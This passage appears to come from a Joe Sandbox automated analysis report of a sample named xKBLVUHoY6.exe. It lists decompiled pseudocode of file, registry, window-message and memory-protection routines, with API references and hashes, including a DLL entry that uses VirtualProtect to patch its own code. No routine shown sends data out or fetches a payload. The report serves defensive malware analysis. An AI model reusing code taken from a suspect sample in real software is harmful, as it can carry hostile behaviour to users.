                                                				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                				return _t6;
                                                			}





                                                0x00405ffb
                                                0x00406008
                                                0x0040601d
                                                0x00406023

                                                APIs
                                                • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\xKBLVUHoY6.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405FD2(WCHAR* _a4) {
                                                				signed char _t3;
                                                				signed char _t7;
                                                
                                                				_t3 = GetFileAttributesW(_a4); // executed
                                                				_t7 = _t3;
                                                				if(_t7 != 0xffffffff) {
                                                					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                				}
                                                				return _t7;
                                                			}





                                                0x00405fd7
                                                0x00405fdd
                                                0x00405fe2
                                                0x00405feb
                                                0x00405feb
                                                0x00405ff4

                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,?,00405BD7,?,?,00000000,00405DAD,?,?,?,?), ref: 00405FD7
                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405FEB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                • Instruction ID: 846b50f6ec280e5947384c74444241e6b9796591039fc91e932c01759f2cc32f
                                                • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                • Instruction Fuzzy Hash: 2CD0C972504531ABC2102728EE0889BBB55EF642717054A35FAA5A22B0CB304C529E98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405AB5(WCHAR* _a4) {
                                                				int _t2;
                                                
                                                				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                				if(_t2 == 0) {
                                                					return GetLastError();
                                                				}
                                                				return 0;
                                                			}




                                                0x00405abb
                                                0x00405ac3
                                                0x00000000
                                                0x00405ac9
                                                0x00000000

                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
                                                • GetLastError.KERNEL32 ref: 00405AC9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryErrorLast
                                                • String ID:
                                                • API String ID: 1375471231-0
                                                • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                • Instruction ID: 81e7360d8487983dd45b28c0c59a41c1d83062ba9acea414cf4290cf05fa9266
                                                • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                • Instruction Fuzzy Hash: C3C04C30314601AED7505B609E48B177EA19B94741F1A85396146E41A4DA389455DD2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004023B2(int __eax, WCHAR* __ebx) {
                                                				WCHAR* _t11;
                                                				WCHAR* _t13;
                                                				void* _t17;
                                                				int _t21;
                                                
                                                				_t11 = __ebx;
                                                				_t5 = __eax;
                                                				_t13 = 0;
                                                				if(__eax != __ebx) {
                                                					__eax = E00402DA6(__ebx);
                                                				}
                                                				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
                                                					_t13 = E00402DA6(0x11);
                                                				}
                                                				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
                                                					_t11 = E00402DA6(0x22);
                                                				}
                                                				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
                                                				_t21 = _t5;
                                                				if(_t21 == 0) {
                                                					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                				}
                                                				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t17 - 4));
                                                				return 0;
                                                			}







                                                0x004023b2
                                                0x004023b2
                                                0x004023b4
                                                0x004023b8
                                                0x004023bb
                                                0x004023c0
                                                0x004023c5
                                                0x004023ce
                                                0x004023ce
                                                0x004023d3
                                                0x004023dc
                                                0x004023dc
                                                0x004023e9
                                                0x004015b4
                                                0x004015b6
                                                0x0040292e
                                                0x0040292e
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringWrite
                                                • String ID:
                                                • API String ID: 390214022-0
                                                • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                                • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040607A(void* _a4, void* _a8, long _a12) {
                                                				int _t7;
                                                				long _t11;
                                                
                                                				_t11 = _a12;
                                                				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                				if(_t7 == 0 || _t11 != _a12) {
                                                					return 0;
                                                				} else {
                                                					return 1;
                                                				}
                                                			}





                                                0x0040607e
                                                0x0040608e
                                                0x00406096
                                                0x00000000
                                                0x0040609d
                                                0x00000000
                                                0x0040609f

                                                APIs
                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034AC,00000000,00000000,00403303,000000FF,00000004,00000000,00000000,00000000), ref: 0040608E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                • Instruction ID: c8e4d841af9964a9af1d27d101842a5e1860e0780d1899a5c61b78fe641b59a9
                                                • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                • Instruction Fuzzy Hash: 84E08632140219ABCF10EE518C00EEB379CFF01390F054432F911E2140D638E92187A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004060A9(void* _a4, void* _a8, long _a12) {
                                                				int _t7;
                                                				long _t11;
                                                
                                                				_t11 = _a12;
                                                				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                				if(_t7 == 0 || _t11 != _a12) {
                                                					return 0;
                                                				} else {
                                                					return 1;
                                                				}
                                                			}





                                                0x004060ad
                                                0x004060bd
                                                0x004060c5
                                                0x00000000
                                                0x004060cc
                                                0x00000000
                                                0x004060ce

                                                APIs
                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347A,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060BD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                • Instruction ID: 36c6d552b97af02dd58307b05a598db1695570393df740455f8c701413f3969e
                                                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                • Instruction Fuzzy Hash: AFE0E632150169ABDF10DE559C00EEB775CEB05351F014476F955E3150DA31E87197A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                
                                                				 *0x6eb85048 = _a4;
                                                				if(_a8 == 1) {
                                                					VirtualProtect(0x6eb8505c, 4, 0x40, 0x6eb8504c); // executed
                                                					 *0x6eb8505c = 0xc2;
                                                					 *0x6eb8504c = 0;
                                                					 *0x6eb85054 = 0;
                                                					 *0x6eb85068 = 0;
                                                					 *0x6eb85058 = 0;
                                                					 *0x6eb85050 = 0;
                                                					 *0x6eb85060 = 0;
                                                					 *0x6eb8505e = 0;
                                                				}
                                                				return 1;
                                                			}



                                                0x6eb82a88
                                                0x6eb82a8d
                                                0x6eb82a9d
                                                0x6eb82aa5
                                                0x6eb82aac
                                                0x6eb82ab1
                                                0x6eb82ab6
                                                0x6eb82abb
                                                0x6eb82ac0
                                                0x6eb82ac5
                                                0x6eb82aca
                                                0x6eb82aca
                                                0x6eb82ad2

                                                APIs
                                                • VirtualProtect.KERNELBASE(6EB8505C,00000004,00000040,6EB8504C), ref: 6EB82A9D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.753716661.000000006EB81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EB80000, based on PE: true
                                                • Associated: 00000000.00000002.753709872.000000006EB80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.753728079.000000006EB84000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.753739144.000000006EB86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6eb80000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 3418a1101f68eb6bf4cf15530889172efb87aee51d2bf389267a7e34ab0e21fd
                                                • Instruction ID: d9c5d27f71604e383e35ebc67b028a43d02e9a3724de539ed038d1872aa6f635
                                                • Opcode Fuzzy Hash: 3418a1101f68eb6bf4cf15530889172efb87aee51d2bf389267a7e34ab0e21fd
                                                • Instruction Fuzzy Hash: 22F0C9B0506B83DECB50CF78844470B3FE0B72B304B14452AE14AEB340E3349444DB9E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00406374(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                				void* _t7;
                                                				long _t8;
                                                				void* _t9;
                                                
                                                				_t7 = E004062F3(_a4,  &_a12);
                                                				if(_t7 != 0) {
                                                					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
                                                					return _t8;
                                                				}
                                                				_t9 = 6;
                                                				return _t9;
                                                			}






                                                0x0040637e
                                                0x00406385
                                                0x00406398
                                                0x00000000
                                                0x00406398
                                                0x00406389
                                                0x00000000

                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406402,?,00000000,?,?,Call,?), ref: 00406398
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                • Instruction ID: 95f024e915835d806257714b27b18acfdec26fcf9bd71fa5ecdde53cd8054228
                                                • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                • Instruction Fuzzy Hash: 00D0123210030DBBDF11AF90DD01FAB3B1DAB08310F014436FE06A5091D776D530AB64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004015A3() {
                                                				int _t5;
                                                				void* _t11;
                                                				int _t14;
                                                
                                                				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
                                                				_t14 = _t5;
                                                				if(_t14 == 0) {
                                                					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                				}
                                                				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t11 - 4));
                                                				return 0;
                                                			}






                                                0x004015ae
                                                0x004015b4
                                                0x004015b6
                                                0x0040292e
                                                0x0040292e
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 484c1fb7531d88e09ef65b29159250032d25401e38421a99c1db0096a302077e
                                                • Instruction ID: dab120aab1e819a0f3e7a590800bcc330433e48d8fa1e5c71f26214da8b737bd
                                                • Opcode Fuzzy Hash: 484c1fb7531d88e09ef65b29159250032d25401e38421a99c1db0096a302077e
                                                • Instruction Fuzzy Hash: B4D01272B08110DBDB11DBA8AA48B9D72A4AB50364B208537D111F61D0E6B9C5559619
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004044AF(int _a4) {
                                                				struct HWND__* _t2;
                                                				long _t3;
                                                
                                                				_t2 =  *0x4291f8;
                                                				if(_t2 != 0) {
                                                					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                                					return _t3;
                                                				}
                                                				return _t2;
                                                			}





                                                0x004044af
                                                0x004044b6
                                                0x004044c1
                                                0x00000000
                                                0x004044c1
                                                0x004044c7

                                                APIs
                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
                                                • Instruction ID: 22c14ff0de7d99e8655fd7423acc63eaa31bea8074cc9abcc6b2c74ee929f0f7
                                                • Opcode Fuzzy Hash: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
                                                • Instruction Fuzzy Hash: 54C09B71740706BBEE608F519D49F1777586750700F298579B755F60D0C674E410DA1C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00404498(int _a4) {
                                                				long _t2;
                                                
                                                				_t2 = SendMessageW( *0x42a228, 0x28, _a4, 1); // executed
                                                				return _t2;
                                                			}




                                                0x004044a6
                                                0x004044ac

                                                APIs
                                                • SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
                                                • Instruction ID: a70792fcf8e9dbddb4bc54a752e2f47ec30058e0f009e109d264f56951a5bac9
                                                • Opcode Fuzzy Hash: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
                                                • Instruction Fuzzy Hash: 28B09236281A00EBDE614B00EE09F457A62A768701F008468B641240B0CAB240A5DB19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004034AF(long _a4) {
                                                				long _t2;
                                                
                                                				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                				return _t2;
                                                			}




                                                0x004034bd
                                                0x004034c3

                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,00403847,?), ref: 004034BD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00404485(int _a4) {
                                                				int _t2;
                                                
                                                				_t2 = EnableWindow( *0x423704, _a4); // executed
                                                				return _t2;
                                                			}




                                                0x0040448f
                                                0x00404495

                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,0040425C), ref: 0040448F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
